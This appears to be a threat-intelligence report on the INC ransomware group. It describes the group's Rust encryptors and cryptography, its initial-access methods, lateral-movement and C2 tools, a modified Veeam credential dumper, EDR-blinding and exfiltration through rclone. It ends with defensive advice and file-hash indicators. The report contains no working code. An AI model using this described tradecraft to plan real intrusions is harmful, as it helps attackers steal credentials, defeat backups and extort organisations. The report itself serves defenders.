Evolution of the INC Ransomware Ecosystem: From Emerging Threat to Top-Tier RaaS

The INC ransomware group has undergone a significant metamorphosis, transitioning from a niche emerging threat into one of the most prolific Ransomware-as-a-Service (RaaS) operations of 2026. Since its emergence in 2023, the group has claimed responsibility for more than 800 victimizations. By strategically capitalizing on the operational vacuum left by competitors, INC has aggressively expanded its affiliate network, solidifying its position in the cybercriminal hierarchy.

Recent campaign telemetry highlights a dual-pronged approach to extortion: the traditional theft and threat of data exposure (double extortion) coupled with high-impact psychological warfare. Notably, the group has begun utilizing automated network printing to distribute ransom demands physically, ensuring that the threat is visible even if digital displays are compromised.

Technical Architecture and Tooling Modernization

A critical driver of INC’s success is the recent overhaul of its codebase. The group has largely migrated to Rust for both its Windows and Linux/ESXi encryptors. This architectural shift provides several advantages for the threat actor: it enables seamless cross-platform builds and complicates reverse engineering efforts due to unique compiler artifacts and containerized build traces that are less familiar to standard analysis sandboxes.

The Windows payloads typically manifest as heavily obfuscated PE64 binaries. While some samples utilize VMProtect to thwart automated analysis, other builds are more “naked,” exposing clear import tables and native API calls. Despite this variance, static and dynamic analysis confirms the malware is heavily operator-driven. The binaries are designed for granular control via command-line arguments and utilize a sophisticated multi-threading model, spawning a threadpool sized at (CPU Cores × 4) to maximize encryption throughput.

To balance speed with system availability, INC implements several encryption modes (fast, medium, and slow) and utilizes partial encryption heuristics. This allows the malware to rapidly lock critical file headers while maintaining enough host responsiveness to present ransom instructions to the user.

The cryptographic implementation follows a robust hybrid model:

• Asymmetric/Symmetric Hybrid: Uses Curve25519-derived keys combined with AES or Salsa constructions to secure per-file keys.
• File Identification: Encrypted files are appended with a distinctive footer signature and renamed with a consistent .INC extension.
• Linux/ESXi Specialization: On virtualized environments, the binary implements X25519 ECDH to derive AES-CTR keys. The Linux variant includes specialized routines to enumerate virtual machines via vim-cmd, allowing the attacker to force shutdowns and maximize impact across the entire virtualized infrastructure.

The group’s victimology is global but heavily skewed toward the United States. High-profile targets have included NHS Scotland, Xerox, and the Texas State Bar. Detailed analysis of their attack chain and evolving TTPs can be found via the Acronis Threat Research Unit (TRU).

2026 top ransomware groups (Source: Acronis Threat Research).

The Intrusion Lifecycle: Human-Operated Precision

INC does not rely on automated “spray and pray” tactics; instead, they follow a sophisticated, human-operated playbook. Initial access is typically gained through:

• Targeted spear-phishing campaigns.
• The purchase of valid credentials from Initial Access Brokers (IABs).
• Exploitation of known vulnerabilities in public-facing edge devices, such as Citrix, Fortinet, and recent flaws in SimpleHelp RMM.

Once inside a network, actors perform discovery and lateral movement using a mix of native system tools (Living off the Land) and legitimate third-party software, including Angry IP Scanner, PsExec, RDP, and various commercial RMM solutions. For Command and Control (C2) and hands-on-keyboard activity, they frequently deploy Cobalt Strike, AnyDesk, ScreenConnect, and TeamViewer.

INC ransomware attack chain (Source: Acronis Threat Research).

Targeting Backups and Defeating Recovery

A significant recent evolution in INC’s TTPs is their focus on disrupting recovery capabilities. Telemetry has identified a customized credential dumper specifically designed to target Veeam backups. A modified version of Veeam-Get-Creds.ps1 has been observed in the wild, featuring hardcoded SQL connection parameters and support for Veeam’s modern salted DPAPI credential encryption. This allows attackers to neutralize backups before the encryption phase even begins.

Defense evasion is equally aggressive. The group utilizes PsKill and custom terminators that deploy vulnerable drivers to kill security processes. They also employ DeviceIoControl calls to delete shadow copies and execute targeted attempts to blind Endpoint Detection and Response (EDR) solutions.

Data exfiltration is typically staged using 7-Zip for compression and rclone for transfer to cloud storage providers, a method that facilitates high-speed data movement while blending in with legitimate outbound traffic.

Linux/ESXi format (Source: Acronis Threat Research).

Operational Posture and Ecosystem Proliferation

Beyond the code, INC operates a professionalized extortion infrastructure. This includes a private negotiation portal for direct victim contact and a public leak site for “naming and shaming.” The recent introduction of networked printer exploitation—where the malware sends print jobs containing ransom demands to office printers—serves as a powerful psychological lever to force rapid decision-making.

The group’s influence has also expanded through the secondary market; a 2024 source-code sale led to the emergence of derivative ransomware families, such as Lynx and Sinobi, effectively propagating INC’s techniques across the wider threat landscape.

Defensive Recommendations

To mitigate the risk of an INC intrusion, organizations should prioritize the following:

• Surface Reduction: Patch critical edge vulnerabilities (Citrix, Fortinet, RMM tools) immediately.
• Backup Hardening: Protect backup server credentials with MFA and monitor specifically for unauthorized access to Veeam or similar environments.
• Behavioral Monitoring: Implement detection rules for abnormal rclone activity, unauthorized use of PsExec, and unexpected print jobs.
• Credential Protection: Monitor for the execution of credential-dumping scripts and unusual PowerShell activity.

Indicators of Compromise (IOCs)

Windows Hashes

31800380c359143ae82c4f9011eee653dd22443d03d6a499148203bbfc275502
ea721240c14e3d14f8d88e0020880448c6c602f1180a1e5dbe40871cfeedcc22
8d1a22c430252f29611766b8e4a82af0fba60d609246463466b384d6d4793df4
bf8c45e5aa9551a17eefbd1d179422c32b4309c47ee9a3f315bb80ed6d4f7efc
6bf155b269d452f3c3b62832b27bbebe4da436e228dbf521155b1d5989e3743f
1898d056463284d849801cbdea6a3dec6c9f568f01569912c3868a5eea9a5449
24f6c0ca39b2a5593086ff56d818ddfbde121f8e44d54faa762e510397dc9db7
dc9938f51150d13a69fc25f3f19052eacb1bf0a086fd5cf39762501fb3ddd7da
acce811c4fc2a6e3fddd4231e386f1648ca44f039d2d275316bc0a0fc96e0af4
90e46e89fec2108a1cb4850bb33e3563e92a14d04e1e613ac8c9311f152d294c
ff5da8f0330a4c581c37284c74aae2683c007dc6e406e1e2e6803e7bb398b77b
97aebda5482899fef84a24e456bff055acaa47e5ab4029f768d9e0c62a660ce2
1d10d8f5a420d0e4683b4cb40bcf0c984d1e7ea1f3b4442a00a525584632ac11
f6a01d0246ce31faf6938ea488086d4358505405a4ef5c5faa482e79e92cb347
d65120291dee76c694f8bea54841f7f68329b499b28f4aee5ea5c9369a7432cb
765508aa2ec6a1b73a76a23f4fa559d32355622748c91a46ed7b315eae2ee60a
d26bfb0147f60dc6500a9298d521ee67b49daaf4b8f8be54e7cc8fd86a597570

Linux Hashes

589d9480fbfec2d8e61638eb0b537183d0f9977411fd1d2c0f8eb611feebe880
7f37351979c249417cb180b4ede0ed17e5fe2a1f08add4d72606b589f8fdb245
5cc212f84d2bf3fbab165aaf09b16e00fcf2f1ccd880d24b14404c53dcdbf241
60aeb9f7bccf377ff02ed64783e66a62c0f976878d9729b067bc7e5b0b9da9d6
6cd349eda0fa6c8b274a0920852c68f8b727afea1fdbc69ad183cef05d9cf141